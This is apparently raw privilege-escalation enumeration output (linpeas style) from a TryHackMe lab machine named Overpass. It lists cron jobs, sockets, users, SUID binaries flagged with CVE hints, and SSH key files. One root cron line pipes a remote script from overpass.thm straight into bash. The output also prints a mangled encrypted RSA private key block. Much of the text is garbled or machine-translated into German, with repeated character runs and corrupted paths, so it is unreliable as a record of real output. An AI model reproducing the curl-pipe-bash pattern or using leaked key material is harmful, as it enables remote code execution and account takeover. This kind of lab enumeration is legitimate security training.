bsdmainutils -rwxr-xr-x 1 root root 1176 Nov 2 2017 dpkg -rwxr-xr-x 1 root root 372 Aug 21 2017 logrotate -rwxr-xr-x 1 root root 1065 Apr 7 2018 man-db -rwxr-xr-x 1 root root 539 Jan 14 2020 mdadm -rwxr-xr-x 1 root root 538 Mar 1 2018 mlocate -rwxr-xr-x 1 root root 249 Jan 25 2018 passwd -rwxr-xr-x 1 root root 3477 Feb 21 2018 popularity-contest -rwxr-xr-x 1 root root 246 Mar 21 2018 ubuntu-advantage-tools -rwxr-xr-x 1 root root 214 Nov 12 2018 update-notifier-common /etc/cron.hourly: total 12 drwxr-xr-x 2 root root 4096 Feb 3 2020 . drwxr-xr-x 90 root root 4096 Jun 27 2020 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder /etc/cron.monthly: total 12 drwxr-xr-x 2 root root 4096 Feb 3 2020 . drwxr-xr-x 90 root root 4096 Jun 27 2020 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder /etc/cron.weekly: total 20 drwxr-xr-x 2 root root 4096 Feb 3 2020 . drwxr-xr-x 90 root root 4096 Jun 27 2020 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder -rwxr-xr-x 1 root root 723 Apr 7 2018 man-db -rwxr-xr-x 1 root root 211 Nov 12 2018 update-notifier-common SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) * * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash ╔══════════╣ Systemd PATH ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ╔══════════╣ Analyzing .service files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services You can't write on systemd PATH ╔══════════╣ System timers ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers NEXT LEFT LAST PASSED UNIT ACTIVATES Tue 2023-07-25 04:47:06 UTC 13h left Mon 2023-07-24 13:08:01 UTC 1h 40min ago apt-daily.timer apt-daily.service Tue 2023-07-25 06:45:52 UTC 15h left Mon 2023-07-24 13:08:01 UTC 1h 40min ago apt-daily-upgrade.timer apt-daily-upgrade.service Tue 2023-07-25 09:07:40 UTC 18h left Mon 2023-07-24 13:08:01 UTC 1h 40min ago motd-news.timer motd-news.service Tue 2023-07-25 13:23:13 UTC 22h left Mon 2023-07-24 13:23:13 UTC 1h 24min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service Mon 2023-07-31 00:00:00 UTC 6 days left Mon 2023-07-24 13:08:01 UTC 1h 40min ago fstrim.timer fstrim.service n/a n/a n/a n/a ureadahead-stop.timer ureadahead-stop.service ╔══════════╣ Analyzing .timer files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers ╔══════════╣ Analyzing .socket files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets /etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request /lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket /lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket /lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log /lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout /lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket /lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog /lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log /lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout /lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket /lib/systemd/system/uuidd.socket is calling this writable listener: /run/uuidd/request ╔══════════╣ Unix Sockets Listening ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets /run/acpid.socket └─(Read Write) /run/dbus/system_bus_socket └─(Read Write) /run/lvm/lvmetad.socket /run/lvm/lvmpolld.socket /run/systemd/journal/dev-log └─(Read Write) /run/systemd/journal/socket └─(Read Write) /run/systemd/journal/stdout └─(Read Write) /run/systemd/journal/syslog └─(Read Write) /run/systemd/notify └─(Read Write) /run/systemd/private └─(Read Write) /run/udev/control /run/user/1001/gnupg/S.dirmngr └─(Read Write) /run/user/1001/gnupg/S.gpg-agent └─(Read Write) /run/user/1001/gnupg/S.gpg-agent.browser └─(Read Write) /run/user/1001/gnupg/S.gpg-agent.extra └─(Read Write) /run/user/1001/gnupg/S.gpg-agent.ssh └─(Read Write) /run/user/1001/systemd/notify └─(Read Write) /run/user/1001/systemd/private └─(Read Write) /run/uuidd/request └─(Read Write) /var/run/dbus/system_bus_socket └─(Read Write) ╔══════════╣ D-Bus config files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus Possible weak user policy found on /etc/dbus-1/system.d/dnsmasq.conf ( <policy user="dnsmasq">) Mögliche schwache Benutzerrichtlinien finden Sie unter /etc/dbus-1/system.d/org.freedesktop.thermald.conf (<policy group="power"> ) ╔═════════╣ D-BUS-Serviceobjekte Liste ╚ https://book.hacktricks.xyz/linux-hardening/privilege-calation#n-bus Name PID-Prozess Benutzerverbindung Einheit Sitzung Beschreibung: 1.0 597 systemd-network systemd-network: 1.0 systemd-networkd.service-: 1.1 1 599 systemd-resolvs systemd -resolved.service - -: 1.119 8844 busctl James: 1.119 Session -14 - SSCOPE 14 -: 1,2 616 SYSTEMD -LOGIND Wurzel: 1,2 systemd -logind.Service -: 1.3 1 systemd root: 1.3 init.scope - -: 1.5 637 Accounts accounts -DAMONS [0M -Wurzel : 1.6 networkD -dispatcher.se ... ce - -: 1.7 656 polkitd root: 1.7 polkit.service - -: 1,8 629 unbeaufsichtigtes upgrose: 1,8 unbeaufsichtigt. io.netplan.netplan - - - (aktivierbar) - - org.freedesktop.accounts 637 Accounts -DAemon [0M Root: 1,5 Accounts -Daemon.Service - - org.freedesktop.dbus 1 systemd root - init.Scope - org. polkit.service - - org.freedesktop.hostname1 - - - (aktivatable) - - org.freedesktop.locale1 - - (aktivatable) - - org.freedesktop.Login1 616 systemd -logind Root: 1.2 systemd -logind.service - - - org.freedesktopt. systemd -network systemd -network: 1.0 systemd -networkd.service - - org.freedesktop.resolve1 599 systemd -resolve systemd -resolve: 1.1 systemd -resolved.Service - - org.freedesKtop.Stemd1 1 systemd.-10D -Wurzel. . FF02 :: 2 IP6-ALLROUTERS NAMESERVER 127.0.0.53 Optionen edns0 Search EU-west-1.comPute.internal ╔═════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ Eth0: Flags = 4163<UP,BROADCAST,RUNNING,MULTICAST> MTU 9001 INET 10.10.13.114 NETMASK 255.255.0.0 Broadcast 10.10.255.255 INET6 Fe80 :: 3c: 53ff: Fe4d: E1F7 Präfixlen 64 Scopeid 0x20<link> ether 02:3c:53:4d:e1:f7 txqueuelen 1000 (Ethernet) RX packets 3689783 bytes 280964917 (280.9 MB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 3081389 bytes 302650811 (302.6 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 LO: Flags = 73<UP,LOOPBACK,RUNNING> MTU 65536 INET 127.0.0.1 NETMASK 255.0.0.0 INET6 :: 1 Präfixlen 128 Scopeid 0x10<host> Loop Txqueuelen 1000 (lokale Loopback) RX -Pakete 1442 Bytes 163048 (163,0 kb) Rx -Fehler 0 fallen 0 Überrahmen 0 TX Pakete 1442 Bytes 163048 (163,0 kb) Tx -Fehler 0 fallen 0. 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp6 0 0 :::80 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - ╔══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ ═══════════════════════════════════════════════════════════════════════ ╚═════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ /usr/bin/gpg netpgpkeys Not Found netpgp Not Found ╔══════════════════════════════════════╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid ╔═══════════════════════════════════════════════════════════════════════════════════════════════════════════ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens ptrace protection is enabled (1) ╔════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ ╔═════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ ╔═════════════╣ All users & groups uid=0(root) gid=0(root) groups=0(root) uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m) uid=10(uucp) gid=10(uucp) groups=10(uucp) uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network) uid=1000(tryhackme) gid=1000(tryhackme) groups=1000(tryhackme),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd) uid=1001(james) gid=1001(james) groups=1001(james) uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve) uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm) uid=103(messagebus) gid=107(messagebus) groups=107(messagebus) uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup) uid=105(lxd) gid=65534(nogroup) groups=65534(nogroup) uid=106(uuidd) gid=110(uuidd) groups=110(uuidd) uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup) uid=108(landscape) gid=112(landscape) groups=112(landscape) uid=109(pollinate) gid=1(daemon[0m) groups=1(daemon[0m) uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup) uid=13(proxy) gid=13(proxy) groups=13(proxy) uid=2(bin) gid=2(bin) groups=2(bin) uid=3(sys) gid=3(sys) groups=3(sys) uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=34(backup) gid=34(backup) groups=34(backup) uid=38(list) gid=38(list) groups=38(list) uid=39(irc) gid=39(irc) groups=39(irc) groups=39(irc) groups=39(irc) uid=4(sync) gid=65534(nogroup) groups=65534(nogroup) uid=41(gnats) gid=41(gnats) groups=41(gnats) uid=5(games) gid=60(games) groups=60(games) uid=6(man) gid=12(man) groups=12(man) uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) uid=7(lp) gid=7(lp) groups=7(lp) uid=8(mail) gid=8(mail) groups=8(mail) uid = 9 (news) gid = 9 (news) gruppen = 9 (news) ╔═══════════════╣ Login Now 14:48:13 Up 1:40, 2 Benutzer, Lastdurchschnitt: 0,47, 0,15, 0,04 Benutzer tty von login@ idle Jcpu pcpu was James PTS/0 10.18.110.90 13:19 13.00S 0.11s 0.11s 0.11s 0.11s 0,11s 0,11s 0,11s 0,11s 0,11s 0,11s 0.00S 0,00S/BinaS/BinaS. 10.18.110.90 14:47 21.00S 0.03S 0.03S -BASH ╔═════════╣ Letzte Logons Tryhackme PTS/0 Sa 27. Juni 04:01:36 2020 - Sa 27. Juni 04:15:54 2020 (00:14) 192.168.170.1 JUNS 27:5:5:5. SAT 27 04:01:18 2010170.1 04.15. 2020 (00:14) 0.0.0.0 Tryhackme PTS/0 Sa 27. Juni 03:59:56 2020 - Sa 27. Juni 04:01:08 2020 (00:01) 192.168.170.1 Tryhackme PTS/0 Sa 2 27. Juni 02:28:30 2020 - Sa 27.03020 - Sa. 192.168.170.1 Neustartsystem Boot Sa 27 02:27:38 2020 - Sa 27 04:01:13 2020 (01:33) 0.0.0.0 Tryhackme PTS/0 Sa 27. Juni 02:16:00 2020 - Sa 27.27. 27. Juni 02:15:41 2020 - Sa 27. Juni 02:17:21 2020 (00:01) 0.0.0.0.0 Neustartsystem Start Sa 27. Juni 02:14:58 2020 - Sa Sa 2 27. Juni 27:27:34 2020 (00:12) 0.0.0.0.0.0 WTMP -PORT SAG JUNG 27 02:14:58 2020, 2020.0.0 WTMP -PORT SAG JUNGEN SAUSEN 27.02:14:14 tryhackme pts/0 10.10.155.141 Thu Sep 24 21:04:14 +0000 2020 james pts/1 10.18.110.90 Mon Jul 24 14:47:50 +0000 2023 ╔═══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ ╔═══════════════════════════════════════════════════════════════════ ═════════════════════════════════════════════════════════════════════ ╚═════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ /usr/bin/wget ╔═══════════════╣ Installed Compilers ii g++ 4:7.4.0-1ubuntu2.3 amd64 GNU C++ compiler ii g++-7 7.5.0-3ubuntu1~18.04 amd64 GNU C++ compiler ii gcc 4:7.4.0-1ubuntu2.3 amd64 GNU C compiler ii gcc-7 7.5.0-3ubuntu1~18.04 amd64 GNU C compiler /usr/bin/gcc ╔═════════╣ Analyzing Rsync Files (limit 70) -rw-r--r-- 1 root root 1044 Feb 14 2020 /usr/share/doc/rsync/examples/rsyncd.conf [ftp] comment = public archive path = /var/www/pub use chroot = yes lock file = /var/lock/rsyncd read only = yes list = yes uid = nobody gid = nogroup strict modes = yes ignore errors = no ignore nonreadable = yes transfer logging = no timeout = 600 refuse options = checksum dry-run dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz ╔═══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ ╔═════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ AES-128-CBC,9F85D92F34F42626F13A7493AB48F337 LNu5wQBBz7pKZ3cc4TWlxIUuD/opJi1DVpPa06pwiHHhe8Zjw3/v+xnmtS3O+qiN JHnLS8oUVR6Smosw4pqLGcP3AwKvrzDWtw2ycO7mNdNszwLp3uto7ENdTIbzvJal 73/eun9kyf0ua9rzc6mwoi2ig6sdlnl4zqSyy7rrvdxeczjkgzqgzkb9wkgw1ljt wdyy8qncljugoif8qrhoo30gv+Damfiptsr43fgbz/HHA4jugoIf0p0pvufVdvdvdvdz/HHA4jugoIf. BMXMR3XUKKB6I6K/JLJQWCLRHPWS0QRJ718G/U8CQYX3OJMM0OO3JGOXYXXEWGSZ AL5BLQFHZJNGOZ+N5NHOLL1OBL1TMSUIRWYK7WT/9KVUIL3RHKVUIL3RHKVUIL3RHKVUIL3RHKVUIL3RHKVUIL3RHKVU3RAHRHKVU3RHKVU3RHKRAHRHKRAHRAHRHKRAHRHKRAHRHKRAHRHKRAHRAHRHKVUIL3RHKVUIL3RHKRAHRAHRHKVUIL3RHKVUIL3RHKVUIL3RHKVUIL3RHKRAHRAHR 3KWMS4DM4AOTOPTIAMVYAKMCWOPF6LE1+WZZ/UPRNCAGEGTLZKX/JORUW7ZJUAUF ABBRLLWFVPMGAHRBP6VRFNECSXZTBFMXPOVWVWRQ98Z+P8MiOREB7JFUSY6GVZK Vfw2gpmkar8ydqynuukowexpedHwislg1Krjkrqp7gcupvw/r/yc1rmntfzt5eer OkuotMQMD3LJ07YYElyAVLBHRZ5FJVZPM3RIMRWESL8GH1D4L5RAKVCUSDFCG8P 9bqukwbzvzhbaqTagvgy0fkjv1wha+pjtlqwu+c15wf7enb3dm5qDuosslpzrjze EAPG5O4U9FQ0ZAYPKMLYJCZRVP43DE4KKKYO5FQ+XSXCE3FW0B63+8RYO5FQ+XSXCE3FW0B63+8RYO5FQ+XSXCE3FW0B63+8RYO5FQ+XSXCE3FW0B63+8RYO5FQ+XSXCE3FW0B63+8RYOGCZ+XSXCE3FW0B63+8RYOGCZ+XSXCE3FW0B63+8RYOGCZ 4TBAPY+UZ34JXE8JELHRKV9XW/7ZG2LOKKMNLJG2YFIAPR99NZFVZS1XOFCCKM8 GFHEOT4YFWRXHU1FJQJW/CR0KBHOV7RFV5X7L36X3z exxouodqDAztjrxoyrnyotyf9WPLHLRHAPBAKXZVNSOERB3TJCA8YDBKSYASDCGY AIPX52BiOBLDHG8DMPAPR1C1ZRYWT1LEFKT7KKAaOGBW3G5RASZB54MQPX6WL+WK 6p7/wOX6WMo1MlkF95M3C7dxPFEspLHfpBxf2qys9MqBsd0rLkXoYR6gpbGbAW58 dPm51MekHD+WeP8oTYGI4PVCS/WF+U90Gty0UmgyI9qfxMVIu1BcmJhzh8gdtT0i n0Lz5pKY+rLxdUaAA9KVwFsdiXnXjHEE1UwnDqqrvgBuvX6Nux+hfgXi9Bsy68qT 8HiUKTEsukcv/IYHK1s+Uw/H5AWtJsFmWQs3bw+Y4iw+YLZomXA4E7yxPXyfWm4K 4FMG3NG0E4/7HRYJSAXLQOKEWCF/LW5DIPO7DMBJVLSC8EYJ8UJEUTP/GCA5L6Z YLQILOGJ4+YIS813KNTJCJOWKRSXG2JKBNRA8B7DSRZ7DSRZ7DSRZ7DSRZ7DZ7DZ7DZ7DZ7DZ7DZ7DZ7DZ7ADZ7DZ7DZ7DZ7DZ7DZ7DZ7DZ7DZ7DZ7DZ7DZ7DZ7DZ7DZ7DZ7DZ7DZVLPJNE 49TxToi53ZB14+ougkL4svJyYYIRuQjrUmierXAdmbYF9wimhmLfelrMcofOHRW2 +hL1kHlTtJZU8Zj2Y2Y3hd6yRNJcIgCDrmLbn9C5M0d7g0h2BlFaJIZOYDS6J6Yk 2cwk/mln7+ohaapavdbkvm7/lgr9/svpceeos6htfbxbmSiv+eofzutujtymv8u7 --- end RSA Privat SCHLÜSSEL-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- AAAAB3NZAC1YC2eaaaadaqabaaAbaqc7kz42Emwhckwltukipjmnmal53YO/QBKBJCP28TYPB3IODXEDZJXFBAG3AAEGU pbcbkjktmoktp7z4aywvrkunzxw5e9K1HH7APN1GDXR66LJ/1SSSVZBP7WIL1GGYTAVTCWPMW9JDPN72U82JOXKH1KNLVK SWTYIF5XXOO21PYVCVW0QO7TEEJI7MIWEWFM3MO8U4HHB3AOSS8QLUX2FKMP/A7BUA923MUZJRDEVEVZUZ7/DDDGTCTR Arnu/fuhjhp71zqfd1wj9b9zkfqmd/5v5ysuh0onozqof8xexvhiaxrsq+opiumuzxpbi0Adxbpj2dvymuUuUpjpjjin/n James@Overpass-Prod -rw-rw-r-- 1 James James 401 Jun 27 2020 /home/james/.sssh/authorized_keys ssh-rsa AAAAB3NZAC1YC2eaaaadaqabaaAbaqc7kz42Emwhckwltukipjmnmal53YO/QBKBJCP28TYPB3IODXEDZJXFBAG3AAEGU pbcbkjktmoktp7z4aywvrkunzxw5e9K1HH7APN1GDXR66LJ/1SSSVZBP7WIL1GGYTAVTCWPMW9JDPN72U82JOXKH1KNLVK SWTYIF5XXOO21PYVCVW0QO7TEEJI7MIWEWFM3MO8U4HHB3AOSS8QLUX2FKMP/A7BUA923MUZJRDEVEVZUZ7/DDDGTCTR Arnu/fuhjhp71zqfd1wj9b9zkfqmd/5v5ysuh0onozqof8xexvhiaxrsq+opiumuzxpbi0Adxbpj2dvymuUuUpjpjjin/n James@Overpass-prod -rw-r- r-- 1 Root 608 Jun 27 2020 /etc/SSH/SSH_HOST_DSA_KEY.PUB -rw-r- r-- 1 Root 180 Jun 27 2020 /etc/SSH/SSH.HOST_HOST_ECDSA_KEY.PUB -rw-r- -RW-R-- 1 Wurzel Root 400 Jun 27 2020 /etc/sssh/sssh_host_rsa_key.pub -rw-r- r-- 1 James James 401 Jun 27 2020 /home/james/.sssh/id_rsa /home/james/.sssh/id_rsa ══╣ Einige Zertifikate wurden gefunden (Out Limited): /etc/pollinate/entropy.ubuntu.com.pem /etc/ssl/certs/accvraiz1.pem /etc/ssl/certs/ac_raiz_fnmtrcm.pem /etc/ssl/certs/actalis_authentication_root_ca.pem /etc/ssl/certs/apirmtrust_commercial.pem /etc/SSL/certs/Aunttrust_networking.pem/ /etc/ssl/certs/Abrirmtrust_premium_ecc.pem /etc/ssl/certs/amazon_root_ca_1.pem /etc/ssl/certs/amazon_root_ca_2.pem/ /etc/ssl/certs/amazon_root_ca_4.pem /etc/ssl/certs/atos_trustedroot_2011.pem /etc/ssl/certs/Autoridadad_de_certificacion_firmaprofessional_cif_a62634068.pem.pem /etc/ssl/certs/baltimore_cybertrust_root.pem /etc/ssl/certs/buypass_class_2_root_ca.pem /etc/SSL/certs/buypass_class_3_root_ca.pem/ /etc/ssl/certs/cfca_ev_root.pem /etc/ssl/certs/comodo_certification_authority.pem 4593pstorage_certsbin ══╣ Eine Home SSH -Konfigurationsdatei wurde gefunden/uSr/openssh/sSHD_CONFIGING Challengers -Challenger -Challenger -Challenger -Challenger -Challenger -Challenger -Challenger -Challenger -Challenger -Challenger -Diskussions -Datei. AcceptEnv LANG LC_* Subsystem sftp /usr/lib/openssh/sftp-server ══╣ /etc/hosts.allow file found, trying to read the rules: /etc/hosts.allow Searching inside /etc/ssh/ssh_config for interesting info Host * SendEnv LANG LC_* HashKnownHosts yes GSSAPIAuthentication yes ╔═══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ /etc/pam.d -RW-R-R-- 1 Root Root 2133 März 2019 /etc/pam.d/Sshd Account erforderlich pam_nologin motd =/run/motd.dynamic Session Optional pam_motd.so noupdate session optional pam_mail default=bad] pam_selinux.so open ╔════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ /tmp/tmux-1001 ╔═════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ /usr/share/keyrings ╔═════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ /usr/bin/gpg netpgpkeys Not Found netpgp Not Found -rw-r--r-- 1 root root 2794 Sep 17 2018 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg -rw-r--r-- 1 root root 1733 Sep 17 2018 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg -rw-r--r-- 1 root root 3267 Jan 10 2019 /usr/share/gnupg/distigkey.gpg -rw-r--r-- 1 root root 7399 Sep 17 2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg -rw-r--r-- 1 root root 6713 Oct 27 2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg -rw-r--r-- 1 root root 4097 Feb 6 2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg -rw-r--r-- 1 root root 0 Jan 17 2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg -rw-r--r-- 1 root root 2253 Mar 21 2018 /usr/share/keyrings/ubuntu-esm-keyring.gpg -rw-r--r-- 1 root root 1139 Mar 21 2018 /usr/share/keyrings/ubuntu-fips-keyring.gpg -rw-r--r-- 1 root root 1139 Mar 21 2018 /usr/share/keyrings/ubuntu-fips-updates-keyring.gpg -rw-r--r-- 1 root root 1227 May 27 2010 /usr/share/keyrings/ubuntu-master-keyring.gpg -rw-r--r-- 1 root root 2867 Feb 22 2018 /usr/share/popularity-contest/debian-popcon.gpg drwx----- 3 james james 4096 Jul 24 14:48 /home/james/.gnupg ╔═════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ 1 root root 856 Apr 2 2018 /usr/share/bash-completion/completions/bind ╔════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ /etc/skel/.profile -rw-r--r-- 1 james james 807 Jun 27 2020 /home/james/.profile ╔═══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ with Interesting Permissions ╠══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ Check easy privesc, exploits and write perms ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid -rwsr-xr-x 1 root root 31K Aug 11 2016 /bin/fusermount -rwsr-xr-x 1 root root 27K Jan 8 2020 /bin/umount ---> BSD/Linux(08-1996) -rwsr-xr-x 1 root root 44K Mar 22 2019 /bin/su -rwsr-xr-x 1 root root 43K Jan 8 2020 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8 -rwsr-xr-x 1 root root 63K Jun 28 2019 /bin/ping -rwsr-xr-x 1 root root 75K Mar 22 2019 /usr/bin/chfn ---> SuSE_9.3/10 -rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614) -rwsr-xr-x 1 root root 44K Mar 22 2019 /usr/bin/chsh -rwsr-xr-x 1 root root 146K Jan 31 2020 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable -rwsr-xr-x 1 root root 59K Mar 22 2019 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997) -rwsr-xr-x 1 root root 22K Mar 27 2019 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485) -rwsr-xr-x 1 root root 19K Jun 28 2019 /usr/bin/traceroute6.iputils -rwsr-xr-x 1 root root 40K Mar 22 2019 /usr/bin/newgrp ---> HP-UX_10.20 -rwsr-xr-x 1 root root 75K Mar 22 2019 /usr/bin/gpasswd -rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 14K Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1 -rwsr-xr-- 1 root messagebus 42K Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 427K Mar 4 2019 /usr/lib/openssh/ssh-keysign ╔════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ /usr/bin/mlocate -rwxr-sr-x 1 root ssh 355K Mar 4 2019 /usr/bin/ssh-agent -rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614) -rwxr-sr-x 1 root tty 31K Jan 8 2020 /usr/bin/wall -rwxr-sr-x 1 root shadow 71K Mar 22 2019 /usr/bin/chage -rwxr-sr-x 1 root crontab 39K Nov 16 2017 /usr/bin/crontab -rwxr-sr-x 1 root tty 14K Jan 17 2018 /usr/bin/bsd-write -rwxr-sr-x 1 root shadow 23K Mar 22 2019 /usr/bin/expiry -rwxr-sr-x 1 root utmp 10K Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter ╔════════════════════════════════╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld.so /etc/ld.so.conf Content of /etc/ld.so.conf: include /etc/ld.so.conf.d/*.conf /etc/ld.so.conf.d /etc/ld.so.conf.d/fakeroot-x86_64-linux-gnu.conf - /usr/lib/x86_64-linux-gnu/libfakeroot /etc/ld.so.conf.d/libc.conf - /usr/local/lib /etc/ld.so.conf.d/x86_64-linux-gnu.conf - /usr/local/lib/x86_64-linux-gnu - /lib/x86_64-linux-gnu - /usr/lib/x86_64-linux-gnu /etc/ld.so.preload ╔═══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ CapEff: 0x000000000= CapBnd: 0x0000003ffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutab le,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_sys_sys_sys_sys_ chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_l ease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read CapAmb: 0x00000000= ═╣ Parent process capabilities CapInh: 0x00000000= CapPrm: 0x0000000= CapEff: 0x0000000= CapBnd: 0x0000003ffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutab le,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_sys_sys_sys_sys_ chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_l ease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read CapAmb: 0x0000000000000= Files with capabilities (limited to 50): /usr/bin/mtr-packet = cap_net_raw+ep ╔══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ Mar 26 2018 sbin.dhclient -rw-r--r-- 1 root root 125 Nov 23 2018 usr.bin.lxc-start -rw-r--r-- 1 root root 2857 Apr 7 2018 usr.bin.man -rw-r--r-- 1 root root 1550 Apr 24 2018 usr.sbin.rsyslogd -rw-r-- 1 root root 1353 Mar 31 2018 usr.sbin.tcpdump ╔═════════════════════════════════════════════════════════════════════════════════════════════════════════════════ ACLs (limited to 50) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls files with acls in searched folders Not Found ╔════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ 4096 Jun 27 2020 .. -rw-r--r-- 1 root root 96 Sep 27 2019 01-locale-fix.sh -rw-r--r-- 1 root root 1557 Dec 4 2017 